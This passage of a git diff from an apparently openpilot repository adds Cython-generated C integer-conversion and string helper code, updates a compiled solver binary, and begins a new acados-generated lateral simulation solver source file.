long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(long) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + long val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (long) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (long) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (long) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (long) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (long) -1; + } + } else { + long val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (long) -1; + val = __Pyx_PyInt_As_long(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to long"); + return (long) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to long"); + return (long) -1; +} + +/* CIntFromPy */ + static CYTHON_INLINE char __Pyx_PyInt_As_char(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const char neg_one = (char) -1, const_zero = (char) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(char) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(char, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (char) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(char, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(char) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) >= 2 * PyLong_SHIFT)) { + return (char) (((((char)digits[1]) << PyLong_SHIFT) | (char)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(char) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) >= 3 * PyLong_SHIFT)) { + return (char) (((((((char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(char) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) >= 4 * PyLong_SHIFT)) { + return (char) (((((((((char)digits[3]) << PyLong_SHIFT) | (char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (char) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(char) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(char, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(char) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(char, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(char, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(char) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 2 * PyLong_SHIFT)) { + return (char) (((char)-1)*(((((char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(char) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 2 * PyLong_SHIFT)) { + return (char) ((((((char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(char) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 3 * PyLong_SHIFT)) { + return (char) (((char)-1)*(((((((char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(char) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 3 * PyLong_SHIFT)) { + return (char) ((((((((char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(char) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 4 * PyLong_SHIFT)) { + return (char) (((char)-1)*(((((((((char)digits[3]) << PyLong_SHIFT) | (char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(char) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 4 * PyLong_SHIFT)) { + return (char) ((((((((((char)digits[3]) << PyLong_SHIFT) | (char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(char) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(char, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(char) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(char, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + char val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (char) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (char) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (char) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (char) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (char) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(char) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((char) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(char) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((char) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((char) 1) << (sizeof(char) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (char) -1; + } + } else { + char val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (char) -1; + val = __Pyx_PyInt_As_char(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to char"); + return (char) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to char"); + return (char) -1; +} + +/* FormatTypeName */ + #if CYTHON_COMPILING_IN_LIMITED_API +static __Pyx_TypeName +__Pyx_PyType_GetName(PyTypeObject* tp) +{ + PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, + __pyx_n_s_name_2); + if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { + PyErr_Clear(); + Py_XSETREF(name, __Pyx_NewRef(__pyx_n_s__84)); + } + return name; +} +#endif + +/* CheckBinaryVersion */ + static int __Pyx_check_binary_version(void) { + char ctversion[5]; + int same=1, i, found_dot; + const char* rt_from_call = Py_GetVersion(); + PyOS_snprintf(ctversion, 5, "%d.%d", PY_MAJOR_VERSION, PY_MINOR_VERSION); + found_dot = 0; + for (i = 0; i < 4; i++) { + if (!ctversion[i]) { + same = (rt_from_call[i] < '0' || rt_from_call[i] > '9'); + break; + } + if (rt_from_call[i] != ctversion[i]) { + same = 0; + break; + } + } + if (!same) { + char rtversion[5] = {'\0'}; + char message[200]; + for (i=0; i<4; ++i) { + if (rt_from_call[i] == '.') { + if (found_dot) break; + found_dot = 1; + } else if (rt_from_call[i] < '0' || rt_from_call[i] > '9') { + break; + } + rtversion[i] = rt_from_call[i]; + } + PyOS_snprintf(message, sizeof(message), + "compile time version %s of module '%.100s' " + "does not match runtime version %s", + ctversion, __Pyx_MODULE_NAME, rtversion); + return PyErr_WarnEx(NULL, message, 1); + } + return 0; +} + +/* InitStrings */ + #if PY_MAJOR_VERSION >= 3 +static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { + if (t.is_unicode | t.is_str) { + if (t.intern) { + *str = PyUnicode_InternFromString(t.s); + } else if (t.encoding) { + *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); + } else { + *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); + } + } else { + *str = PyBytes_FromStringAndSize(t.s, t.n - 1); + } + if (!*str) + return -1; + if (PyObject_Hash(*str) == -1) + return -1; + return 0; +} +#endif +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { + while (t->p) { + #if PY_MAJOR_VERSION >= 3 + __Pyx_InitString(*t, t->p); + #else + if (t->is_unicode) { + *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); + } else if (t->intern) { + *t->p = PyString_InternFromString(t->s); + } else { + *t->p = PyString_FromStringAndSize(t->s, t->n - 1); + } + if (!*t->p) + return -1; + if (PyObject_Hash(*t->p) == -1) + return -1; + #endif + ++t; + } + return 0; +} + +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { + return __Pyx_PyUnicode_FromStringAndSize(c_str, (Py_ssize_t)strlen(c_str)); +} +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { + Py_ssize_t ignore; + return __Pyx_PyObject_AsStringAndSize(o, &ignore); +} +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +#if !CYTHON_PEP393_ENABLED +static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + char* defenc_c; + PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); + if (!defenc) return NULL; + defenc_c = PyBytes_AS_STRING(defenc); +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + { + char* end = defenc_c + PyBytes_GET_SIZE(defenc); + char* c; + for (c = defenc_c; c < end; c++) { + if ((unsigned char) (*c) >= 128) { + PyUnicode_AsASCIIString(o); + return NULL; + } + } + } +#endif + *length = PyBytes_GET_SIZE(defenc); + return defenc_c; +} +#else +static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + if (likely(PyUnicode_IS_ASCII(o))) { + *length = PyUnicode_GET_LENGTH(o); + return PyUnicode_AsUTF8(o); + } else { + PyUnicode_AsASCIIString(o); + return NULL; + } +#else + return PyUnicode_AsUTF8AndSize(o, length); +#endif +} +#endif +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT + if ( +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + __Pyx_sys_getdefaultencoding_not_ascii && +#endif + PyUnicode_Check(o)) { + return __Pyx_PyUnicode_AsStringAndSize(o, length); + } else +#endif +#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) + if (PyByteArray_Check(o)) { + *length = PyByteArray_GET_SIZE(o); + return PyByteArray_AS_STRING(o); + } else +#endif + { + char* result; + int r = PyBytes_AsStringAndSize(o, &result, length); + if (unlikely(r < 0)) { + return NULL; + } else { + return result; + } + } +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { + int is_true = x == Py_True; + if (is_true | (x == Py_False) | (x == Py_None)) return is_true; + else return PyObject_IsTrue(x); +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { + int retval; + if (unlikely(!x)) return -1; + retval = __Pyx_PyObject_IsTrue(x); + Py_DECREF(x); + return retval; +} +static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { + __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); +#if PY_MAJOR_VERSION >= 3 + if (PyLong_Check(result)) { + if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, + "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " + "The ability to return an instance of a strict subclass of int is deprecated, " + "and may be removed in a future version of Python.", + result_type_name)) { + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; + } + __Pyx_DECREF_TypeName(result_type_name); + return result; + } +#endif + PyErr_Format(PyExc_TypeError, + "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", + type_name, type_name, result_type_name); + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { +#if CYTHON_USE_TYPE_SLOTS + PyNumberMethods *m; +#endif + const char *name = NULL; + PyObject *res = NULL; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x) || PyLong_Check(x))) +#else + if (likely(PyLong_Check(x))) +#endif + return __Pyx_NewRef(x); +#if CYTHON_USE_TYPE_SLOTS + m = Py_TYPE(x)->tp_as_number; + #if PY_MAJOR_VERSION < 3 + if (m && m->nb_int) { + name = "int"; + res = m->nb_int(x); + } + else if (m && m->nb_long) { + name = "long"; + res = m->nb_long(x); + } + #else + if (likely(m && m->nb_int)) { + name = "int"; + res = m->nb_int(x); + } + #endif +#else + if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { + res = PyNumber_Int(x); + } +#endif + if (likely(res)) { +#if PY_MAJOR_VERSION < 3 + if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { +#else + if (unlikely(!PyLong_CheckExact(res))) { +#endif + return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); + } + } + else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_TypeError, + "an integer is required"); + } + return res; +} +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { + Py_ssize_t ival; + PyObject *x; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(b))) { + if (sizeof(Py_ssize_t) >= sizeof(long)) + return PyInt_AS_LONG(b); + else + return PyInt_AsSsize_t(b); + } +#endif + if (likely(PyLong_CheckExact(b))) { + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(__Pyx_PyLong_IsCompact(b))) { + return __Pyx_PyLong_CompactValue(b); + } else { + const digit* digits = __Pyx_PyLong_Digits(b); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); + switch (size) { + case 2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + } + } + #endif + return PyLong_AsSsize_t(b); + } + x = PyNumber_Index(b); + if (!x) return -1; + ival = PyInt_AsSsize_t(x); + Py_DECREF(x); + return ival; +} +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { + if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { + return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); +#if PY_MAJOR_VERSION < 3 + } else if (likely(PyInt_CheckExact(o))) { + return PyInt_AS_LONG(o); +#endif + } else { + Py_ssize_t ival; + PyObject *x; + x = PyNumber_Index(o); + if (!x) return -1; + ival = PyInt_AsLong(x); + Py_DECREF(x); + return ival; + } +} +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { + return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); +} +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { + return PyInt_FromSize_t(ival); +} + + +/* #### Code section: utility_code_pragmas_end ### */ +#ifdef _MSC_VER +#pragma warning( pop ) +#endif + + + +/* #### Code section: end ### */ +#endif /* Py_PYTHON_H */ diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so index 5ef67ef9b..b706c9d01 100755 Binary files a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so and b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so differ diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_sim_solver_lat.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_sim_solver_lat.c new file mode 100644 index 000000000..d0c541d3b --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_sim_solver_lat.c @@ -0,0 +1,278 @@ +/* + * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, + * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, + * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, + * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl + * + * This file is part of acados. + * + * The 2-Clause BSD License + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE.; + */ +// standard +#include +#include + +// acados +#include "acados_c/external_function_interface.h" +#include "acados_c/sim_interface.h" +#include "acados_c/external_function_interface.h" + +#include "acados/sim/sim_common.h" +#include "acados/utils/external_function_generic.h" +#include "acados/utils/print.h" + + +// example specific +#include "lat_model/lat_model.h" +#include "acados_sim_solver_lat.h" + + +// ** solver data ** + +sim_solver_capsule * lat_acados_sim_solver_create_capsule() +{ + void* capsule_mem = malloc(sizeof(sim_solver_capsule)); + sim_solver_capsule *capsule = (sim_solver_capsule *) capsule_mem; + + return capsule; +} + + +int lat_acados_sim_solver_free_capsule(sim_solver_capsule * capsule) +{ + free(capsule); + return 0; +} + + +int lat_acados_sim_create(sim_solver_capsule * capsule) +{ + // initialize + const int nx = LAT_NX; + const int nu = LAT_NU; + const int nz = LAT_NZ; + const int np = LAT_NP; + bool tmp_bool; + + + double Tsim = 0.009765625; + + + // explicit ode + capsule->sim_forw_vde_casadi = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)); + 